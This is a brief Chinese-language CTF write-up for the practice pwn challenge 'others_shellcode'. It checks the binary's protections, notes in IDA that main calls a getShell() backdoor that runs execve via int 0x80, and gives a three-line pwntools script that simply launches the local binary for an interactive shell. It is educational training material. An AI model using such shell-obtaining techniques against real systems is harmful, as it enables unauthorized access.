others_shellcode
使用checksec
查看:

只留了一个Canary,栈不可执行和PIE都开了。
先放进IDA中分析:

getShell();
:主函数中直接给了后门函数,跟进查看。
getShell();
:

__asm { int 80h; LINUX - sys_execve }
:直接syscall 80
拿权限了。
题目思路
步骤解析
无需
完整exp
from pwn import *
r = process("../buu/others_shellcode")
r.interactive()